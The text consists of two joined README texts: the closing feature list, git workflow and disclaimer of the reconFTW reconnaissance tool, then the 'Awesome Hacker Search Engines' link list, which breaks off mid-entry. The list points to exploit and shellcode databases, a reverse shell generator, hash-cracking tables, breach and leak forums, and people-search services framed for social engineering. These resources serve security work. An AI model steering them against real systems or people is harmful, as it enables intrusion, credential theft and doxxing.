Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - TLS handshake ([tlsx](https://github.com/projectdiscovery/tlsx)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig)) - Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum)) ## Hosts - IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/) - CDN checker ([ipcdn](https://github.com/six2dez/ipcdn)) - WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [smap](https://github.com/s0md3v/Smap)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gau](https://github.com/lc/gau), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Ansible + Terraform deployment over AWS - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## Support this project ### Buymeacoffee [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) ### DigitalOcean referral link <a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a> ### GitHub sponsorship [Sponsor](https://github.com/sponsors/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) [<img src="https://pbs.twimg.com/profile_images/1509304017993752578/qqcKUKZb_400x400.jpg" width="100" height=auto>](https://github.com/geeknik) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [Spyse](https://spyse.com/) - [Networksdb](https://networksdb.io/) - [Intelx](https://intelx.io/) - [BinaryEdge](https://www.binaryedge.io/) - [Censys](https://censys.io/) - [CIRCL](https://www.circl.lu/) - [Whoxy](https://www.whoxy.com/) # Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under GNU GPLv3.
<h1 align="center"> <b>Awesome Hacker Search Engines</b> <img src="https://raw.githubusercontent.com/edoardottt/images/main/awesome-hacker-search-engines/awesome.svg"/> </h1> <p align="center"> A curated list of awesome search engines useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more </p> <p align="center"> <a href="https://github.com/edoardottt/awesome-hacker-search-engines#general-search-engines" target="_blank">General</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#servers" target="_blank">Servers</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#vulnerabilities" target="_blank">Vulnerabilities</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#exploits" target="_blank">Exploits</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#attack-surface" target="_blank">Attack surface</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#code-search-engines" target="_blank">Code</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#mail-addresses" target="_blank">Mail addresses</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#domains" target="_blank">Domains</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#urls" target="_blank">URLs</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#dns" target="_blank">DNS</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#certificates" target="_blank">Certificates</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#wifi-networks" target="_blank">WiFi networks</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#device-information" target="_blank">Device Info</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#credentials" target="_blank">Credentials</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#leaks" target="_blank">Leaks</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#hidden-services" target="_blank">Hidden Services</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#social-networks" target="_blank">Social Networks</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#phone-numbers" target="_blank">Phone numbers</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#threat-intelligence" target="_blank">Threat Intelligence</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#web-history" target="_blank">Web History</a> • <a href="https://github.com/edoardottt/awesome-hacker-search-engines#surveillance-cameras" target="_blank">Surveillance cameras</a> </p> ### General Search Engines - [Google](https://www.google.com/) - [Bing](https://www.bing.com/) - [Yahoo!](http://www.yahoo.com/) - [Yandex](https://yandex.com/) - [Ask](https://www.ask.com/) - [Baidu](https://www.baidu.com/) - [You](https://you.com/) - [SearXNG](https://searx.be/?q=) - [EXALead](http://www.exalead.com/search/web/) ### Servers - [Shodan](https://shodan.io) - Search Engine for the Internet of Everything - [Censys Search](https://search.censys.io/) - Search Engine for every server on the Internet to reduce exposure and improve security - [Onyphe.io](https://www.onyphe.io/) - Cyber Defense Search Engine for open-source and cyber threat intelligence data - [ZoomEye](https://www.zoomeye.org/) - Global cyberspace mapping - [GreyNoise](https://viz.greynoise.io/) - The source for understanding internet noise - [Natlas](https://natlas.io/) - Scaling Network Scanning - [Netlas.io](https://netlas.io/) - Discover, Research and Monitor any Assets Available Online - [FOFA](https://fofa.info/) - Cyberspace mapping - [Quake](https://quake.360.net/quake/#/index) - Cyberspace surveying and mapping system - [Hunter](https://hunter.how/) - Internet Search Engines For Security Researchers ### Vulnerabilities - [NIST NVD](https://nvd.nist.gov/vuln/search) - US National Vulnerability Database - [MITRE CVE](https://cve.mitre.org/cve/search_cve_list.html) - Identify, define, and catalog publicly disclosed cybersecurity vulnerabilities - [GitHub Advisory Database](https://github.com/advisories) - Security vulnerability database inclusive of CVEs and GitHub originated security advisories - [cloudvulndb.org](https://www.cloudvulndb.org/) - The Open Cloud Vulnerability & Security Issue Database - [osv.dev](https://osv.dev/list) - Open Source Vulnerabilities - [Vulners.com](https://vulners.com/) - Your Search Engine for Security Intelligence - [opencve.io](https://www.opencve.io/cve) - Easiest way to track CVE updates and be alerted about new vulnerabilities - [security.snyk.io](https://security.snyk.io/) - Open Source Vulnerability Database - [Mend Vulnerability Database](https://www.mend.io/vulnerability-database/) - The largest open source vulnerability DB - [Rapid7 - DB](https://www.rapid7.com/db/) - Vulnerability & Exploit Database - [CVEDetails](https://www.cvedetails.com/) - The ultimate security vulnerability datasource - [VulnIQ](https://vulniq.com/) - Vulnerability intelligence and management solution - [SynapsInt](https://synapsint.com/) - The unified OSINT research tool - [Aqua Vulnerability Database](https://avd.aquasec.com/) - Vulnerabilities and weaknesses in open source applications and cloud native infrastructure - [Vulmon](https://vulmon.com/) - Vulnerability and exploit search engine - [VulDB](https://vuldb.com/) - Number one vulnerability database - [ScanFactory](https://in.scanfactory.io/cvemon.html) - Realtime Security Monitoring - [Trend Micro Zero Day Initiative](https://www.zerodayinitiative.com/advisories/published/) - Publicly disclosed vulnerabilities discovered by Zero Day Initiative researchers - [Google Project Zero](https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=&sort=-id&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary) - Vulnerabilities including Zero Days - [Trickest CVE Repository](https://github.com/trickest/cve) - Gather and update all available and newest CVEs with their PoC - [cnvd.org.cn](https://www.cnvd.org.cn/) - Chinese National Vulnerability Database - [InTheWild.io](https://inthewild.io/feed) - Check CVEs in our free, open source feed of exploited vulnerabilities - [Vulnerability Lab](https://www.vulnerability-lab.com/) - Vulnerability research, bug bounties and vulnerability assessments - [Red Hat Security Advisories](https://access.redhat.com/security/security-updates/) - Information about security flaws that affect Red Hat products and services in the form of security advisories - [Cisco Security Advisories](https://sec.cloudapps.cisco.com/security/center/publicationListing.x) - Security advisories and vulnerability information for Cisco products, including network equipment and software - [Microsoft Security Response Center](https://msrc.microsoft.com/update-guide/en-us) - Reports of security vulnerabilities affecting Microsoft products and services ### Exploits - [Exploit-DB](https://www.exploit-db.com/) - Exploit Database - [Sploitus](https://sploitus.com/) - Convenient central place for identifying the newest exploits - [Rapid7 - DB](https://www.rapid7.com/db/) - Vulnerability & Exploit Database - [Vulmon](https://vulmon.com/) - Vulnerability and exploit search engine - [packetstormsecurity.com](https://packetstormsecurity.com/) - Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers - [0day.today](https://0day.today/) - Ultimate database of exploits and vulnerabilities - [LOLBAS](https://lolbas-project.github.io/) - Living Off The Land Binaries, Scripts and Libraries - [GTFOBins](https://gtfobins.github.io/) - Curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems - [Payloads All The Things](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/) - A list of useful payloads and bypasses for Web Application Security - [XSS Payloads](http://www.xss-payloads.com/) - The wonderland of JavaScript unexpected usages, and more - [exploitalert.com](https://www.exploitalert.com/search-results.html) - Database of Exploits - [Reverse Shell generator](https://www.revshells.com/) - Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode - [HackerOne hacktivity](https://hackerone.com/hacktivity) - See the latest hacker activity on HackerOne - [Bugcrowd Crowdstream](https://bugcrowd.com/crowdstream) - Showcase of accepted and disclosed submissions on Bugcrowd programs - [GTFOArgs](https://gtfoargs.github.io/) - Curated list of Unix binaries that can be manipulated for argument injection - [shell-storm.org/shellcode](https://shell-storm.org/shellcode/index.html) - Shellcodes database for study cases - [Hacking the Cloud](https://hackingthe.cloud/) - Encyclopedia of the attacks/tactics/techniques that offensive security professionals can use on their next cloud exploitation adventure - [LOLDrivers](https://www.loldrivers.io/) - Open-source project that brings together vulnerable, malicious, and known malicious Windows drivers - [PwnWiki](http://pwnwiki.io/) - Collection of TTPs (tools, tactics, and procedures) for what to do after access has been gained - [CVExploits Search](https://cvexploits.io/) - Your comprehensive database for CVE exploits from across the internet ### Attack Surface - [FullHunt.io](https://fullhunt.io/) - Attack surface database of the entire Internet - [BinaryEdge](https://www.binaryedge.io/) - We scan the web and gather data for you - [Censys ASM](https://censys.io/) - Attack Surface Management Solutions - [RedHunt Labs](https://redhuntlabs.com/) - Discover your Attack Surface, Continuously - [SecurityTrails](https://securitytrails.com/) - The Total Internet Inventory - [overcast-security.com](https://overcast-security.com/) - We make tracking your external attack surface easy - [IPInfo.io](https://ipinfo.io/) - The trusted source for IP address data - [IPData.co](https://ipdata.co/) - IP Geolocation and Threat Intelligence API - [NetworksDB](https://networksdb.io/) - information about the public IPv4 and IPv6 addresses, networks and domains owned by companies and organisations across the world - [ASNlookup](https://asnlookup.com/) - Quickly lookup updated information about specific Autonomous System Number (ASN), Organization, CIDR, or registered IP addresses (IPv4 and IPv6) among other relevant data - [BGPtools](https://bgp.tools/) - Browse the Internet ecosystem - [BGPview](https://bgpview.io/) - Debug and investigate information about IP addresses, ASN, IXs, BGP, ISPs, Prefixes and Domain names - [BigDataCloud](https://www.bigdatacloud.com/) - The API provides comprehensive location and network data - [RADb](https://www.radb.net/query) - The world's largest public routing registry - [Deepinfo](https://www.deepinfo.com/) - Empower your security with the most comprehensive Internet data - [Detectify](https://detectify.com/) - Complete External Attack Surface Management ### Code Search Engines - [GitHub Code Search](https://github.com/search?type=code) - Search globally across all of GitHub, or scope your search to a particular repository or organization - [GitLab Code Search](https://gitlab.com/) - Advanced search for faster, more efficient search across the entire GitLab instance - [Sourceforge](https://sourceforge.net/) - Complete Open-Source and Business Software Platform - [grep.app](https://grep.app/) - Search across a half million git repos - [publicwww.com](https://publicwww.com/) - Find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code - [SearchCode](https://searchcode.com/) - Search 75 billion lines of code from 40 million projects - [NerdyData](https://www.nerdydata.com/) - Find companies based on their website's tech stack or code - [RepoSearch](http://codefinder.org/) - Source code search engine that helps you find implementation details, example usages or just analyze code - [SourceGraph](https://about.sourcegraph.com/) - Understand and search across your entire codebase - [HotExamples](https://hotexamples.com/) - Search code examples from over 1 million projects - [WP Directory](https://wpdirectory.net/) - Lightning fast regex searching of code in the WordPress Plugin and Theme Directories - [GitHub Gists](https://gist.github.com/discover) - Instantly share code, notes, and snippets - [CodeBerg](https://codeberg.org/explore/repos) - Collaboration platform and Git hosting for free and open source software, content and projects - [Fedora Pagure](https://pagure.io/browse/projects/) - Open Source software code hosting system - [LaunchPad](https://launchpad.net/) - Software collaboration platform that provides: Bug tracking, Code hosting, Code reviews, Ubuntu package building and hosting, Translations... - [repo.or.cz](https://repo.or.cz/?a=project_list) - Public Git hosting site - [gitorious.org](https://gitorious.org/) - Read-only mirror of the former gitorious.org code hosting website - [Sourcehut](https://sr.ht/projects) - Collection of tools useful for software development - [android.googlesource.com](https://android.googlesource.com/) - Git repositories on android - [deps.dev](https://deps.dev/) - Service developed and hosted by Google to help developers better understand the structure, construction, and security of open source software packages - [WebFinery](https://webfinery.com/search) - Search the source code of the web - [Google Code Archive](https://code.google.com/archive/) - Data found on the Google Code Project Hosting Service, which was turned down in early 2016 - [Snipplr](https://snipplr.com/all) - Code snippet search engine that allows users to search and share code snippets across various programming languages and frameworks ### Mail Addresses - [Hunter.io](https://hunter.io/) - Find professional email addresses in seconds - [PhoneBook](https://phonebook.cz/) - Lists all domains, email addresses, or URLs for the given input domain - [IntelligenceX](https://intelx.io/) - Search engine and data archive - [Reacher.email](https://reacher.email/) - Open-Source Email Verification - [RocketReach](https://rocketreach.co/) - Your first-degree connection to any professional - [email-format.com](https://www.email-format.com/) - Find the email address formats in use at thousands of companies - [EmailHippo](https://tools.emailhippo.com/) - Email address verification technology - [ThatsThem](https://thatsthem.com/reverse-email-lookup) - Reverse email lookup - [verify-email.org](https://verify-email.org/) - Checks whether the mailbox exists or not - [Melissa - Emailcheck](https://www.melissa.com/v2/lookups/emailcheck/email/) - Check email addresses and verify they are live - [VoilaNorbert](https://www.voilanorbert.com/) - I can find anyone's email address - [SynapsInt](https://synapsint.com/) - The unified OSINT research tool - [skymem.info](http://www.skymem.info/) - Find email addresses of companies and people - [findemails.com](https://www.findemails.com/) - Find Anyone's Email Address in Seconds - [Experte email finder](https://www.experte.com/email-finder) - Find the right email address, even if you only know the name and the company - [EmailSherlock](https://www.emailsherlock.com/) - Search for the Person behind the Email address and find our reputation score - [Anymail Finder](https://anymailfinder.com/) - Find verified emails - [Tomba.io](https://tomba.io/) - With 430+ million email addresses indexed, effective search filters, and deliverability checks, Tomba's email finder is its most powerful tool ### Domains - [PhoneBook](https://phonebook.cz/) - Lists all domains, email addresses, or URLs for the given input domain - [IntelligenceX](https://intelx.io/) - Search engine and data archive - [Omnisint](https://omnisint.io/subdomain-enumeration) - Subdomain enumeration - [Riddler](https://riddler.io/) - Allows you to search in a high quality dataset - [RobTex](https://www.robtex.com/) - Various kinds of research of IP numbers, Domain names, etc - [CentralOps - DomainDossier](https://centralops.net/co/DomainDossier.aspx) - Investigate domains and IP addresses - [DomainIQ](https://www.domainiq.com/) - Comprehensive Domain Intelligence - [whois.domaintools.com](https://whois.domaintools.com/) - Industry’s fastest domain discovery engine and broadest, most accurate data - [grayhatwarfare.com - domains](https://shorteners.grayhatwarfare.com/domains) - How to search URLs exposed by Shortener services - [whoisology.com](https://whoisology.com/) - Deep Connections Between Domain Names & Their Owners - [who.is](https://who.is/) - WHOIS Search, Domain Name, Website, and IP Tools - [pentest-tools.com](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) - Discover subdomains and determine the attack surface of an organization - [BuiltWith](https://builtwith.com/) - Find out what websites are Built With - [MoonSearch](http://moonsearch.com/) - Backlinks checker & SEO Report - [sitereport.netcraft.com](https://sitereport.netcraft.com/) - Find out the infrastructure and technologies used by any site - [SynapsInt](https://synapsint.com/) - The unified OSINT research tool - [spyonweb.com](https://spyonweb.com/) - Find out related websites - [statscrop.com](https://www.statscrop.com/) - Millions of amazing websites across the web are being analyzed with StatsCrop - [securityheaders.com](https://securityheaders.com/) - Scan your site now - [visualsitemapper.com](http://www.visualsitemapper.com/) - Create a visual map of your site - [similarweb.com](https://www.similarweb.com/) - The easiest and fastest tool to find out what's really going on online - [buckets.grayhatwarfare.com](https://buckets.grayhatwarfare.com/) - Public buckets - [C99.nl](https://api.c99.nl/) - Over 57 quality API's and growing! - [wannabe1337.xyz](https://wannabe1337.xyz/) - Online Tools - [subdomainfinder.c99.nl](https://subdomainfinder.c99.nl/) - Scanner that scans an entire domain to find as many subdomains as possible - [AnubisDB](https://jonlu.ca/anubis/) - Subdomain enumeration and information gathering tool - [WhoisXMLAPI](https://www.whoisxmlapi.com/) - Domain & IP Data Intelligence for Greater Enterprise Security - [HypeStat](https://hypestat.com/) - Free statistics and analytics service, where you can find information about every website - [Private Key Project](https://www.pkey.in/tools-i/search-subdomains) - Information security tools from Private Key Project - [SiteDossier](http://www.sitedossier.com/) - Profiles for millions of sites on the web - [SpyOnWeb](https://spyonweb.com/) - Quick and convenient search for the websites that probably belong to the same owner ### URLs - [PhoneBook](https://phonebook.cz/) - Lists all domains, email addresses, or URLs for the given input domain - [IntelligenceX](https://intelx.io/) - Search engine and data archive - [URLScan](https://urlscan.io/) - A sandbox for the web - [HackerTarget](https://hackertarget.com/ip-tools/) - Collect information about IP Addresses, Networks, Web Pages and DNS records - [MOZ Link Explorer](https://moz.com/link-explorer) - The world's best backlink checker with over 40 trillion links - [shorteners.grayhatwarfare.com](https://shorteners.grayhatwarfare.com/) - Search URLs exposed by Shortener services - [CommonCrawl Index](http://index.commoncrawl.org/) - Open repository of web crawl data - [URLVoid](https://www.urlvoid.com/) - Check the online reputation/safety of a website - [Norton SafeWeb](https://safeweb.norton.com/) - Look up a site, Get our rating ### DNS - [DNSDumpster](https://dnsdumpster.com/) - dns recon & research, find & lookup dns records - [Chaos](https://chaos.projectdiscovery.io/#/) - Enhance research and analyse changes around DNS for better insights - [RapidDNS](https://rapiddns.io/) - dns query tool which make querying subdomains or sites of a same ip easy - [DNSdb](https://docs.farsightsecurity.com/#dnsdb) - Passive DNS historical database - [Omnisint](https://omnisint.io/reverse-dns-lookup) - Reverse DNS lookup - [HackerTarget](https://hackertarget.com/ip-tools/) - Collect information about IP Addresses, Networks, Web Pages and DNS records - [passivedns.mnemonic.no](https://passivedns.mnemonic.no/) - Web interface for querying passive DNS data collected in our malware lab - [ptrarchive.com](http://ptrarchive.com/) - Over 230 billion reverse DNS entries from 2008 to the present - [dnshistory.org](http://dnshistory.org/) - Domain Name System Historical Record Archive - [DNSTwister](https://dnstwister.report/) - The anti-phishing domain name search engine and DNS monitoring service - [DNSviz](https://dnsviz.net/) - Tool for visualizing the status of a DNS zone - [C99.nl](https://api.c99.nl/) - Over 57 quality API's and growing - [wannabe1337.xyz](https://wannabe1337.xyz/) - Online Tools - [DNSlytics](https://dnslytics.com/) - Find out everything about a domain name, IP address or provider - [dnsrepo.noc.org](https://dnsrepo.noc.org/) - DNS Database Repository Search - [DNSSpy](https://dnsspy.io/) - Monitor, validate and verify your DNS configurations - [ZETAlytics](https://zetalytics.com/) - We offer unrivalled geographic diversity and exclusive global network visibility in searchable datasets for use by cyber security analysts - [AskDNS](https://askdns.com/) - Lookup Connected Domain Names and IP Addresses - [360 PassiveDNS.CN](https://passivedns.cn/) - Biggest public available db in China designed for security and research purpose - [MXtoolbox](https://mxtoolbox.com/SuperTool.aspx) - All of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool - [NSLookup.io](https://www.nslookup.io/) - Find all DNS records for a domain name using this online tool - [Robtex DNS Lookup](https://www.robtex.com/dns-lookup/) - Get detailed information on the nameservers associated with a domain name ### Certificates - [Crt.sh](https://crt.sh/) - Certificate Search - [CTSearch](https://ui.ctsearch.entrust.com/ui/ctsearchui) - Certificate Transparency Search Tool - [tls.bufferover.run](https://tls.bufferover.run/) - Quickly find certificates in IPv4 space - [CertSpotter](https://sslmate.com/certspotter/) - Monitors your domains for expiring, unauthorized, and invalid SSL certificates - [SynapsInt](https://synapsint.com/) - The unified OSINT research tool - [Censys Search - Certificates](https://search.censys.io/certificates) - Certificates Search - [ciphersuite.info](https://ciphersuite.info/) - TLS Ciphersuite Search. Search for a particular cipher suite by using IANA, OpenSSL or GnuTLS name format - [certificatedetails](https://certificatedetails.com/) - Online certificate viewer. Inspect and dowload certificates from your browser - [FacebookCT](https://developers.facebook.com/tools/ct/search/) - Search for certificates issued for a given domain and subscribe to notifications from Facebook regarding new certificates ### WiFi Networks - [Wigle.net](https://wigle.net/) - Maps and database of 802.11 wireless networks with statistics - [wifimap.io](https://www.wifimap.io/) - Connect to all Free WiFi Hotspots using WiFi Map App all over the World! - [wificafespots.com](http://www.wificafespots.com/) - Free WiFi Cafe Spots - [wifispc.com](https://wifispc.com/) - Free map of Wi-Fi passwords anywhere you go! - [openwifimap.net](https://openwifimap.net/) - HTML5 map with OpenWiFiMap data - [mylnikov.org](https://www.mylnikov.org/) - Public API implementation of Wi-Fi Geo-Location database ### Device Information - [MACVendorLookup.com](https://www.macvendorlookup.com/) - Look up the vendor for a specific MAC Address - [macvendors.com](https://macvendors.com/) - Find MAC Address Vendors. Now - [macaddress.io](https://macaddress.io/) - MAC address vendor lookup - [maclookup.app](https://maclookup.app/) - Find the vendor name of a device by entering an OUI or a MAC address - [macvendors.co](https://macvendors.co/) - Get vendor name of your network device using its mac address ### Credentials - [Have I Been Pwned](https://haveibeenpwned.com/) - Check if your email or phone is in a data breach - [Dehashed](https://www.dehashed.com/) - Free deep-web scans and protection against credential leaks - [LeakCheck.io](https://leakcheck.io/) - Make sure your credentials haven't been compromised - [crackstation.net](https://crackstation.net/) -Massive pre-computed lookup tables to crack password hashes - [HashKiller](https://hashkiller.io/listmanager) - Pre-cracked Hashes, easily searchable - [LeakedPassword](https://leakedpassword.com/) - Search across multiple data breaches to see if your pass has been compromised - [BugMeNot](https://bugmenot.com/) - Find and share logins ### Leaks - [WikiLeaks](https://wikileaks.org/) - News leaks and classified media provided by anonymous sources - [Leak-Lookup](https://leak-lookup.com/) - Search across thousands of data breaches - [Snusbase](https://snusbase.com/) - Stay on top of the latest database breaches - [breachdirectory.org](https://breachdirectory.org/) - Check if your information was exposed in a data breach - [BreachForums](https://breached.to/) - Breaches, Data leaks, databases and more - [Siph0n Breach DB (onionsite)](siphondkh34l5vki.onion/) - Breaches, Data leaks, Exploits - [Exposed Forum](https://exposed.vc/) - The premier Databreach discussion & leaks forum ### Hidden Services - [AHMIA](https://ahmia.fi/) - Search hidden services on the Tor network - [thehiddenwiki.org](https://thehiddenwiki.org/) - The darknet guide - [tor.link](https://tor.link/) - Free anonymous deepweb / Darknet search engine - [deepweblinks.net](https://deepweblinks.net/) - Onion Links - [onionengine.com](https://onionengine.com/) - A search engine for services accessible on the Tor network - [OnionLand](https://onionlandsearchengine.com/) - Discover Hidden Services and access to Tor's onion sites ### Social Networks These can be useful for osint and social engineering. - [Facebook](https://www.facebook.com/) - [Instagram](https://www.instagram.com/) - [YouTube](https://www.youtube.com/) - [Twitter](https://twitter.com/) - [LinkedIn](https://www.linkedin.com/) - [Reddit](https://new.reddit.com/) - [Pinterest](https://www.pinterest.com/) - [Tumblr](https://www.tumblr.com/) - [Flickr](https://www.flickr.com/) - [SnapChat](https://www.snapchat.com/) - [Whatsapp](https://www.whatsapp.com/) - [Quora](https://www.quora.com/) - [TikTok](https://www.tiktok.com/) - [Vimeo](https://vimeo.com/) - [Medium](https://medium.com/) - [WeChat](https://www.wechat.com/) - [VK](https://vk.com/) - [Weibo](https://weibo.com/) - [Tinder](https://tinder.com/) ### Phone Numbers - [NumLookup](https://www.numlookup.com/) - Free reverse phone lookup - [SpyDialer](https://spydialer.com/) - Free Reverse Lookup Search - [WhitePages](https://www.whitepages.com/) - Find people, contact info & background checks - [National Cellular Directory](https://www.nationalcellulardirectory.com/) - Begin your comprehensive people search now - [Phone Validator](https://www.phonevalidator.com/) - Is it a cell phone or is it a landline or is it a fake? - [Free Carrier Lookup](https://freecarrierlookup.com/) - Enter a phone number and we'll return the carrier name - [RocketReach](https://rocketreach.co/) - Your first-degree connection to any professional - [sync.me](https://sync.me/) - Find out who called - [EmobileTracker](https://www.emobiletracker.com/) - Track Mobile Owner Name, Location and Mobile Service Provider - [Reverse Phone Lookup](https://www.reversephonelookup.com/) - Find Out The Owner Of A Phone Number - [ThatsThem](https://thatsthem.com/reverse-phone-lookup) - Reverse phone lookup - [thisnumber.com](https://www.thisnumber.com/) - International Phone Directories - [usphonebook.com](https://www.usphonebook.com/) - Free Reverse Phone Number Lookup - [truepeoplesearch.com](https://www.truepeoplesearch.com/#) - Get current address, cell phone number, email address, relatives, friends and a lot more - [Tellows](https://www.tellows.com/) - Who is calling? The phone number reverse search - [SynapsInt](https://synapsint.com/) - The unified OSINT research tool - [C99.nl](https://api.c99.nl/) - Over 57 quality API's and growing - [ValidNumber.com](https://validnumber.com/) - Free reverse phone lookup service to let you identify a caller associated with any 10-digit phone number from the US and Canada - [CellIdFinder](https://cellidfinder.com/) - Nonprofit project wich helps you to find GSM BTS by MCC, MNC, LAC and CellID - [OldPhoneBook](http://www.oldphonebook.com/) - Intantly search a large selection from the past 20 years of USA phone listings - [Spokeo](https://www.spokeo.com/) - Search by name, phone, address, or email to confidentially lookup information about people you know - [Intelius Phone Lookup](https://www.intelius.com/reverse-phone-lookup/) - Look up a phone number to find owner information, carrier details, and more - [ZabaSearch Phone Lookup](https://www.zabasearch.com/reverse-phone-lookup/) - Reverse Phone 